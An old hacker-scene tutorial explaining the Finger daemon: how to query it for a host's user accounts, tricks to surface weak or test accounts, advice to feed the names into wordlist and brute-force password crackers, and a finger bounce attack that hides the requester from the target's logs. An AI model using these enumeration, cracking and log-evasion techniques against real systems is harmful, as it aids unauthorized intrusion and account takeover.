Info-x: Finger Daemon

Message

   Table of Contents
<================>

1.1 Disclaimer
1.2 An Introduction to Finger
1.3 Using Finger
1.4 Finger Tricks
1.5 Finger Bounce Attack
1.6 Conclusion
1.7 After Word

1.1 Disclaimer:
<=============>

In no way does the author of this tutorial encourage any sort of illegal 
activities
This tutorial's only purpose is to inform and teach about the Finger Deamon 
and its known vulnerabilities.
The author can not be held responsible for anything you do with regards to 
the knowledge in this tutorial.
Be a true hacker, learn and help others (to learn).

1.2 An Introduction to Finger
<===================>

The Finger Deamon is a service that normally runs on port 79 and was 
originally intended as a sort of a digital businesscard for people.
A remote user can send a request to a Finger Deamon running on a system 
(standard finger port is 79) and will get a reply.
This reply will tell you what users are on a system and it will also give 
you some contact information of these users.
Besides just userinfo, often the reply also tells you who the admin of the 
system is and how he can be reached.
People used to connect to al sorts of systems al around the world and Finger 
gave them a bit more information about who's system they
were in and who had accounts there. Finger has always been primarily used at 
Universities but large corporations too.
Back in the days, Finger was so commonly used at universities that students 
who were asked contact info by other students would often
reply with the sentence \"Finger me!\" Since the world wide web however Finger 
has become less and less populair, because we now have
websites to serve as our digital businesscards and people have come to 
notice that with so many security threats these days it just isn't a
very good idea, nor is it worth the trouble to run a Finger Deamon. However, 
not all people have come to this conclusion and you'll find there
are still a lot of systems out there running the Finger service. And these 
days everybody who has a personal computer seems to be running
portscans and trying to break in to systems...without any of the basic 
knowledge required. The Finger Deamon, is a great example of a service
that can (legally) provide you with a huge amount of sensitive information 
about a target. Therefore I will try to explain in this tutorial, in 
understandable
language, what the Finger Deamon is, what it does and how it can be used to 
your advantage.

1.3 Using Finger
<==========>

When you run a portscan of http://www.foobar.com and you find that it has 
port 79 open / listening, this means that http://www.foobar.com
has a Finger Deamon running. Now how would we do a request? Since windows 
most often doesn't have a finger client installed we would just telnet
to the finger server like this:

telnet www.foobar.com 79

and then type in the commands we would like to issue. From a *nix shell we 
don't need to use telnet because we almost always have a finger client 
installed.
We can just type in the commands. From here-on I will assume wyou are using 
a *nix shell. (If you plan to use windows /telnet just type all the same 
commands as in *nix
but leave away the \"finger\" and the @host.com so \"finger .@foobar.com\" would 
become: \".\" after you have telnetted into port 79 of the right host. 
(without the \"\") )
So we want to finger www.foobar.com, this is how we do it:

finger@foobar.com

Results:

Login: Name: Tty: Idle: When: Where:

root foobar sys console 17d Tue 10:13 node0ls3.foobar.com
Amos Amanda <.......> <.......> <.......>
Anderson Kenneth
Bright Adrian
Doe John
Johnson Peter <.......> <.......> <.......>
Mitnick Kevin
Munson Greg
Orwell Dennis

Now what does this tell us?
In the first column we see the usernames and in the second the \"real names\", 
which of course don't always have to be real names, but most of the time 
actually are.
The third column shows the terminal type and the fourth the idle time. After 
that its the time and place when the account was used to log in. Sometimes 
you'll get more
columns with contact address, e-mailaddress, phonenumbers, etc.

If you would like to have more information on a specific user (Peter Johnson 
for example) you would now enter the command:

finger johnson@foobar.com

1.4 Finger Tricks
<===========>

I hope by now you have seen what the main and huge weakness of Finger is. 
For those of you who haven't I will explain.
The finger deamon shows you what accounts are on a certain system. That 
means that you have gained (in a perfectly legal way) 50% of that magical 
combination called
password/username-combination that will give you acces to a system. If you 
have the usernames, the next step would be to load up a (perl) bruteforce or 
worldist password
cracker. There are special scripts written for telnet for example. (Check 
out http://www.thehackerschoice.com/ or search for VLAD's pwscan.pl) You 
should make a wordlist with
passwords that are the same or almost the same as the usernames and if that 
doenst work, start the bruteforce script, get some coffee and sit back and 
relax 'till the script has
done the work for you.

Of course we find some accounts on a host system more interesting than 
others. Mainly the root or admin account because of their special 
priviledges and of course any
other account that we think might have an easy to guess / crack password. 
There are a few nice tricks to get just these kind of accounts. For example 
type in the command:

finger secret@foobar.com

When you issue this command the Finger Daemon will give you all the accounts 
that have the word \"secret\" in either the username or the real name.
What's so special about that? Well you could use \"test\" or \"temp\" or \"0000\" 
instead of \"secret\" and as you probably know these kind of accounts very 
often have rather easy
passwords. passwords that are the same as the username or passwords that are 
almost the same (test0, test1, etc)

finger .@foobar.com

finer 0@foobar.com

Try them and see what happens! try to get to know the finger deamon, read 
the RFC and find your own tricks!

1.5 Finger Bounce Attack
<=================>

It is also possible to hop from one Finger Deamon to the other. For example: 
if I would want to finger \"www.victim.com\" and know that \"www.host.com\" had 
Finger running also, I could
make a request like this:

finger@host.com@victim.com

Host.com would now finger victim.com and show me the results. One of the 
advantages is that I would now be rather anonymous. If www.victim.com would 
log requests than they would
see www.host.com in their logs, and not me. A second advantage is that I 
could let a trusted host finger another computer on the same network, when 
this computer would normally not
allow an incoming finger request from myself.

1.6 Conclusion
<==========>

The Finger Daemon can be a huge source of information for anyone trying to 
gain acces to a system. The Finger daemon legally provides you with half of 
the username-password
combination that is needed to gain acces. There are a few nice tricks to get 
the specific accounts that you are looking for and after that its just a 
question of running a script
that cracks the passwords, using either a wordlist or the bruteforce 
technique. Also keep in mind the advantages of a bounce attack, using the 
finger deamon.

1.7 Afterword
<========>

I hope some of you people out there, that are new to the computer security / 
hacking scene, have learned a thing or two from this tutorial.
There's more at http://paris2k.no-ip.org or http://paris2k.tk

P2K alias Paris2K